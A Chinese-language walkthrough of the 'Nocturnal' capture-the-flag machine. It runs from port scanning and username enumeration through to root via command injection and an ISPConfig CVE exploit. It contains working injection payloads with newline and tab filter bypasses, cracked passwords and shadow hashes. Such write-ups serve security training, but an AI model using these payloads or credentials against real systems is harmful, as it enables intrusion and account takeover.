基本信息

端口扫描

22和80:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
$ nmap -sC -sV -Pn 10.10.11.64
Starting Nmap 7.95 ( https://nmap.org ) at 2025-04-16 15:12 JST
Nmap scan report for 10.10.11.64
Host is up (0.096s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.12 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 20:26:88:70:08:51:ee:de:3a:a6:20:41:87:96:25:17 (RSA)
|   256 4f:80:05:33:a6:d4:22:64:e9:ed:14:e3:12:bc:96:f1 (ECDSA)
|_  256 d9:88:1f:68:43:8e:d4:2a:52:fc:f0:66:d4:b9:ee:6b (ED25519)
80/tcp open  http    nginx 1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://nocturnal.htb/
|_http-server-header: nginx/1.18.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 40.63 seconds

80

需要加hosts:

1
10.10.11.64 nocturnal.htb

在线文件上传查看相关的:

目录扫描

目录扫描可以看到backups,uploads和admin:

1
2
3
4
5
6
gobuster dir -w ~/Tools/dict/SecLists/Discovery/Web-Content/common.txt  -t 50 -u http://nocturnal.htb/

/admin.php            (Status: 302) [Size: 0] [--> login.php]
/backups              (Status: 301) [Size: 178] [--> http://nocturnal.htb/backups/]
/index.php            (Status: 200) [Size: 1524]
/uploads              (Status: 403) [Size: 162]

nocturnal

随意注册登录,测试上传,发现查看文件使用用户名和文件名两个参数:

用户名枚举

简单测试可以发现用户名和文件名并没有绑定,当使用不存在的用户名时,会响应User not found,并且用户名的判断逻辑优先于文件名从而可以枚举用户名:

1
2
3
4
5
6
7
8
ffuf -w ~/Tools/dict/SecLists/Discovery/Web-Content/common.txt:FUZZ -u "http://nocturnal.htb/view.php?username=FUZZ&file=test.pdf" -H "Cookie: PHPSESSID=ik19m9dtqgc52b49o5ff80eb7l"  -fs 2985

abc                     [Status: 200, Size: 3134, Words: 1177, Lines: 129, Duration: 94ms]
abcd                    [Status: 200, Size: 3295, Words: 1180, Lines: 129, Duration: 94ms]
admin                   [Status: 200, Size: 3037, Words: 1174, Lines: 129, Duration: 94ms]
amanda                  [Status: 200, Size: 3189, Words: 1176, Lines: 129, Duration: 95ms]
test                    [Status: 200, Size: 3037, Words: 1174, Lines: 129, Duration: 93ms]
test2                   [Status: 200, Size: 3037, Words: 1174, Lines: 129, Duration: 93ms]

privacy.odt

当用户名存在但文件不存在时,响应给出可用的文件名,其中amanda可以看到一个privacy.odt文件:

这个文件打开会提示损害,word自动修复或者直接grep都可以,得到一个密码:

1
arHkG7HAI68X8s1J

Admin Panel

使用得到的密码登录amanda,可以看到一个admin panel:

backup

有个backup功能,输入密码执行结合查看admin.php代码可以看到是直接执行了系统命令,给出了输出:

存在基础过滤:

命令注入

基础绕过,0a换行,09替代空格:

这种方式可以回显得到输出

1
miao%0abash%09-c%09"whoami"%0a

database

另外从dashboard.php中可以得到数据库文件路径,利用命令注入复制数据库文件,得到包含数据库文件的备份:

1
2
3
$db = new SQLite3('../nocturnal_database/nocturnal_database.db');

miao%0acp%09../nocturnal_database/nocturnal_database.db%09.

之后就是查看数据库,获取hash,破解:

1
2
3
4
5
6
sqlite> select * from users;
1|admin|d725aeba143f575736b07e045d8ceebb
2|amanda|df8b20aa0c935023f99ea58358fb63c4
4|tobias|55c82b1ccd55ab219b3b109b07d5061d

tobias slowmotionapocalypse

user flag

得到的tobias账号密码ssh登录:

ISPConfig

本地8080端口,转发出来查看,是ISPConfig:

1
ssh tobias@10.10.11.64 -L 8085:127.0.0.1:8080

admin密码就是tobias密码:

1
2
admin
slowmotionapocalypse

3.2.10p1

CVE-2023-46818

搜索可以找到相关漏洞:

提权 & root flag

exp一键root:

1
python3 exploit.py http://127.0.0.1:8085/ admin slowmotionapocalypse

shadow

1
2
root:$6$sJtQT08ZefRr6Awp$DBlWukQpaXmhYmGm52nQIqvRLc9DyXwxbDFM9F87xQcxX7B.e82r2/g7L3KZc4m7ywzuu6KGQsNi6vpguIXvi/:20014:0:99999:7:::
tobias:$6$kg9idJil/duVwNce$/29r1quOnEmdLDmeujzUUioimkjZTR/YqjiIk74u5K4X6N4NouhWoL4d3wQ4DZQpHnqZ1URYVATEb5/gz2AGV1:20014:0:99999:7:::

参考资料